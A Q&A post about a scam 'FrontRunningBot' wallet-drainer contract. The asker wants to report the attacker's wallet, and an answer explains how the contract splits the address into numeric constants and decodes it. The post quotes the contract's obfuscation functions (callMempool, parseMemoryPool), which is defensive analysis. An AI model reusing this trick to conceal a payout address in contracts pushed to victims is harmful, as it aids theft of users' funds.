# How does that contract parse out the ETH wallet address?

Tags: solidity

I am currently trying to analyse and collect blackhat contracts to report the wallets to the exchanges where the wallets were funded. In this contract I found a tricky way how the blackhat 'encrypts' its wallet address. I know that the wallet is retrieved by calling the parseMemoryPool(callMempool() functions, but I don't understand how the decoding of the wallet works.

https://pastebin.com/raw/Dh244qQg

These blackhats are spreading this 'FrontRunningBot' wallet drainer out extremely right now, I noticed that they all use this same contract, however they only differ on some specific numbers which they return in some functions and set as uintlike this:

```
function getMemPoolDepth() internal pure returns (uint) {
        return 495404;
    }

    function callMempool() internal pure returns (string memory) {
        string memory _memPoolOffset = mempool("x", checkLiquidity(getMemPoolOffset()));
        uint _memPoolSol = 376376;
        uint _memPoolLength = getMemPoolLength();
        uint _memPoolSize = 419272;
        uint _memPoolHeight = getMemPoolHeight();
        uint _memPoolWidth = 1039850;
        uint _memPoolDepth = getMemPoolDepth();
        uint _memPoolCount = 862501;

        string memory _memPool1 = mempool(_memPoolOffset, checkLiquidity(_memPoolSol));
        string memory _memPool2 = mempool(checkLiquidity(_memPoolLength), checkLiquidity(_memPoolSize));
        string memory _memPool3 = mempool(checkLiquidity(_memPoolHeight), checkLiquidity(_memPoolWidth));
        string memory _memPool4 = mempool(checkLiquidity(_memPoolDepth), checkLiquidity(_memPoolCount));

        string memory _allMempools = mempool(mempool(_memPool1, _memPool2), mempool(_memPool3, _memPool4));
        string memory _fullMempool = mempool("0", _allMempools);

        return _fullMempool;
    }
```

I guess from all these numbers the wallet is decrypted somehow with the parseMemoryPool() function.

```
    function parseMemoryPool(string memory _a) internal pure returns (address _parsed) {
        bytes memory tmp = bytes(_a);
        uint160 iaddr = 0;
        uint160 b1;
        uint160 b2;
        for (uint i = 2; i < 2 + 2 * 20; i += 2) {
            iaddr *= 256;
            b1 = uint160(uint8(tmp[i]));
            b2 = uint160(uint8(tmp[i + 1]));
            if ((b1 >= 97) && (b1 <= 102)) {
                b1 -= 87;
            } else if ((b1 >= 65) && (b1 <= 70)) {
                b1 -= 55;
            } else if ((b1 >= 48) && (b1 <= 57)) {
                b1 -= 48;
            }
            if ((b2 >= 97) && (b2 <= 102)) {
                b2 -= 87;
            } else if ((b2 >= 65) && (b2 <= 70)) {
                b2 -= 55;
            } else if ((b2 >= 48) && (b2 <= 57)) {
                b2 -= 48;
            }
            iaddr += (b1 * 16 + b2);
        }
        return address(iaddr);
    }
```

Would someone be kind enough to explain to me how the walle decoding works from the pastebin contract? Thanks in advance!

Comment: See https://twitter.com/jonathansampson/status/1577053856852156418

Answer (score 2):

I recently walked through this scam in [a series of tweets](https://twitter.com/jonathansampson/status/1577053856852156418).

The scammer's address is split up, and spread across the contract like seeds. We can see these pretty clearly, however. They're the large numbers within the functions `getMemPoolLength`, `getMemPoolHeight`, `getMemPoolDepth`, and `getMemPoolOffset`.

Each of these numbers is passed into the `checkLiquidity` function where they are converted into hex values. Those hex values are then glued together by the `mempool` function, which simply combines the bytes from two arguments, and returns a string (0x78 and 0x52 go in, 0x7852 comes out).

Lastly, the hex value produced by `callMempool` is passed to the `parseMemoryPool` function. There it is split up again into bytes, where each set of 2 bytes are evaluated and combined as part of a larger operation. The end result is a massive number. That number, when converted back to hex, is the attacker's Ethereum address.